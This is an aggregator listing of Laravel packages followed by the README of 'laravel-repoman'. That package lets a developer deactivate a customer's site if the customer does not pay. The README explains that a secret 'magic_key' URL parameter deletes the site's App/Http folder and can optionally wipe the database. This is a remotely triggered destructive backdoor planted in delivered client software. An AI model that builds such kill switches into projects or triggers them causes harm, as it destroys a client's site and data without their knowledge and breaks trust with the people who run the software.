All Projects → WebPajooh → laravel-repoman

WebPajooh / laravel-repoman

Licence: other
Set a payment deadline for the customer

Programming Languages

PHP
23972 projects - #3 most used programming language

Projects that are alternatives of or similar to laravel-repoman

video-downloader
Video Downloader for Facebook.
Stars: ✭ 63 (+350%)
Mutual labels:  package, laravel-package
Laravel Pdf
A Simple package for easily generating PDF documents from HTML. This package is specially for laravel but you can use this without laravel.
Stars: ✭ 79 (+464.29%)
Mutual labels:  package, laravel-package
laravel-username-generator
Automatically generate usernames for Laravel User Model
Stars: ✭ 37 (+164.29%)
Mutual labels:  package, laravel-package
dropzoner
Laravel package for image upload using DropzoneJS
Stars: ✭ 46 (+228.57%)
Mutual labels:  package, laravel-package
Blogetc
Easily add a full Laravel blog (with built in admin panel and public views) to your laravel project with this simple package.
Stars: ✭ 198 (+1314.29%)
Mutual labels:  package, laravel-package
Package Skeleton
📦 My base for PHP packages.
Stars: ✭ 6 (-57.14%)
Mutual labels:  package, laravel-package
Laravel Aws Sns
Laravel package for the AWS SNS Events
Stars: ✭ 24 (+71.43%)
Mutual labels:  package, laravel-package
Laravel Google Translate
This package makes using the Google Translate API in your laravel app a breeze with minimum to no configuration, clean syntax and a consistent package API.
Stars: ✭ 97 (+592.86%)
Mutual labels:  package, laravel-package
Laravel Short Url
A Laravel package to shorten urls
Stars: ✭ 127 (+807.14%)
Mutual labels:  package, laravel-package
Laravel Natural Language
This package makes using the Google Natural API in your laravel app a breeze with minimum to no configuration, clean syntax and a consistent package API.
Stars: ✭ 119 (+750%)
Mutual labels:  package, laravel-package
Laravel Gitscrum
GitScrum is a Project Management Tool, developed to help entrepreneurs, freelancers, managers, and teams Skyrocket their Productivity with the Agile methodology and Gamification.
Stars: ✭ 2,686 (+19085.71%)
Mutual labels:  package, laravel-package
Laravel Multilingual Routes
A package to handle multilingual routes in your Laravel application.
Stars: ✭ 241 (+1621.43%)
Mutual labels:  package, laravel-package
response
Response HTTP package for Simfony, Laravel, Lumen and PHP 7 with standard REST API
Stars: ✭ 14 (+0%)
Mutual labels:  package, laravel-package
emacs-hacker-typer
A customizable implementation of http://hackertyper.com in emacs.
Stars: ✭ 21 (+50%)
Mutual labels:  package
devliver
Your private self hosted composer repository with user management
Stars: ✭ 50 (+257.14%)
Mutual labels:  package
elm-generative
Making generative art in Elm
Stars: ✭ 23 (+64.29%)
Mutual labels:  package
laravel-ovh
Wrapper for OVH Object Storage integration with laravel
Stars: ✭ 30 (+114.29%)
Mutual labels:  laravel-package
laravel-easyblade
Create an easier & readable Blade (view) in Laravel with EasyBlade
Stars: ✭ 64 (+357.14%)
Mutual labels:  laravel-package
laravel-viva-payments
A Laravel package for integrating the Viva Payments gateway
Stars: ✭ 29 (+107.14%)
Mutual labels:  laravel-package
lost-in-translation
Uncover missing translations and localization strings in Laravel applications.
Stars: ✭ 32 (+128.57%)
Mutual labels:  laravel-package

Laravel «Repo Man»

Suppose the customer has not paid and you want to deactivate the site if the deadline is reached and he does not pay!

How to

  1. Install composer require webpajooh/laravel-repoman
  2. Publish repoman.php php artisan vendor:publish
  3. Edit config/repoman.php

Magic key

There is a magic_key option in the configuration file that is commented by default:
'magic_key' => 'Lbs96hv7Fzn28QLSXaIKtAXwlHSDU'
You can change the value, and use it when you want:
example.com/?magic_key=Lbs96hv7Fzn28QLSXaIKtAXwlHSDU
If we send a request to this link, we will lose the App/Http folder! What about the database? Uncomment empty_database, and the package will fresh the database after creating a backup into storage/app directory. Consider that we only support MySQL at the moment.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].